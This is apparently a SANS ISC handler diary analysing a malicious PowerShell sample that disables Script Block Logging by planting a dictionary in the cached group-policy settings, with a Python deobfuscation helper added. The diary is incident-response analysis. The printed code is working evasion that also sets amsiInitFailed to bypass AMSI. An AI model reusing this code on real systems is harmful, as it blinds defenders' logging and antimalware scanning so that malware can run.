
PowerShell has a great built-in feature called "Script Block Logging"[1]. It helps to record all activities performed by a script and is a goldmine for incident handlers. That's the reason why attackers tend to try to disable this feature. There are many ways to achieve this, but I found an interesting one.

The obfuscation technique relies on a "Collections.Generic.Dictionary" object, a generic collection of key/value pairs. Here is the interesting code (I kept only the code relevant to the collection):

```powershell
$wi=(('EnableSc{2}ip{1'+'}{3'+'}'+'lo'+'c'+'{0}Logging')-f'k','t','r','B');
# $db9 is the key/value collection discussed below
$db9=[Collections.Generic.Dictionary[string,System.Object]]::new();
$iN=(('{0}crip{2}'+'B{'+'1}ockL'+'ogg'+'ing')-f'S','l','t');
If($PSVersionTable.PSVersion.Major -ge 3) {
  $zz=[Ref].Assembly.GetType((('S{5}stem.'+'{'+'3}anagem'+'ent'+'.{0'+'}{4}tomation.{2}ti{'+'1}'+'s')-f'A','l','U','M','u','y'));
  $zqu=[Ref].Assembly.GetType((('{5}{6}'+'st{9'+'}m.{2'+'}'+'a'+'na{3'+'}{'+'9}'+'m{9'+'}'+'nt.{'+'8}{0}t'+'{'+'7'+'}'+'ma'+'ti{'+'7}n'+'.{'+'8'+'}msi{1}ti{4}s')-f'u','U','M','g','l','S','y','o','A','e'));
  $rH=(('E'+'na{0}l'+'eSc{3}ipt{1'+'}loc'+'{4}{2}nvoc'+'ation{5}oggi'+'n'+'g')-f'b','B','I','r','k','L');
  $xTv=$zz.GetField('cachedGroupPolicySettings','NonPublic,Static');
  if ($zqu) { $zqu.GetField((('a{3'+'}{4}i'+'I{0'+'}'+'i'+'tF'+'ail{2'+'}{1'+'}')-f'n','d','e','m','s'),'NonPublic,Static').SetValue($null,$true); };
  If ($xTv) {
    $iG5H=$xTv.GetValue($null);
    # the two dictionary entries (see the debugger output below)
    $db9.Add($wi,0);
    $db9.Add($rH,0);
    # the collection is stored under the cached policy path built from $iN
    $iG5H['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$iN]=$db9;
```

The collection of values is created in the $db9 variable. Later two keys are added, and the collection is used to modify the registry to disable the logging feature.

```text
[DBG]: PS C:\Users\REM>> $db9

Key                                Value
---                                -----
EnableScriptBlockLogging           0
EnableScriptBlockInvocationLogging 0
```
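As an added example (not part of the diary), a small Python helper an analyst can use to undo this `-f` format-operator obfuscation and resolve the `$db9.Add()` calls, reproducing the debugger output above. The input is the dictionary-related lines copied from the sample; function and variable names are mine.

```python
import re

# Matches the obfuscation idiom (('a{1}'+'b')-f'x','y'): a parenthesised chain of
# single-quoted literals joined with '+', followed by the -f format operator and
# its comma-separated single-quoted arguments. Assumes no '' escapes inside literals.
FORMAT_RE = re.compile(
    r"\(\(\s*((?:'[^']*'\s*\+\s*)*'[^']*')\s*\)\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\)"
)

# Input copied from the sample above: only the parts that build the dictionary.
SAMPLE = (
    "$wi=(('EnableSc{2}ip{1'+'}{3'+'}'+'lo'+'c'+'{0}Logging')-f'k','t','r','B'); "
    "$db9=[Collections.Generic.Dictionary[string,System.Object]]::new(); "
    "$iN=(('{0}crip{2}'+'B{'+'1}ockL'+'ogg'+'ing')-f'S','l','t'); "
    "$rH=(('E'+'na{0}l'+'eSc{3}ipt{1'+'}loc'+'{4}{2}nvoc'+'ation{5}oggi'+'n'+'g')-f'b','B','I','r','k','L'); "
    "$db9.Add($wi,0); $db9.Add($rH,0);"
)

def _literals(expr):
    """Extract the contents of every single-quoted literal in expr, in order."""
    return re.findall(r"'([^']*)'", expr)

def resolve_format(template_expr, args_expr):
    """Concatenate the literals and substitute {n} placeholders like PowerShell's -f."""
    template = "".join(_literals(template_expr))
    args = _literals(args_expr)
    return re.sub(r"\{(\d+)\}", lambda m: args[int(m.group(1))], template)

def deobfuscate(script):
    """Replace every (('..'+'..')-f'..') expression with its resolved literal."""
    return FORMAT_RE.sub(lambda m: "'" + resolve_format(m.group(1), m.group(2)) + "'", script)

def string_assignments(script):
    """Map variable name -> decoded string for every $var='...' assignment after deobfuscation."""
    return dict(re.findall(r"\$(\w+)='([^']*)'", deobfuscate(script)))

def dictionary_entries(script):
    """Resolve $dict.Add($var,value) calls to {decoded key: value}, as the debugger shows."""
    names = string_assignments(script)
    entries = {}
    for var, value in re.findall(r"\.Add\(\$(\w+),\s*([^)]+)\)", script):
        entries[names.get(var, "$" + var)] = value.strip()
    return entries

if __name__ == "__main__":
    for key, value in dictionary_entries(SAMPLE).items():
        print(f"{key:<40} {value}")
```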

The remaining part of the script is classic and injects shellcode into the PowerShell process.

[1] https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
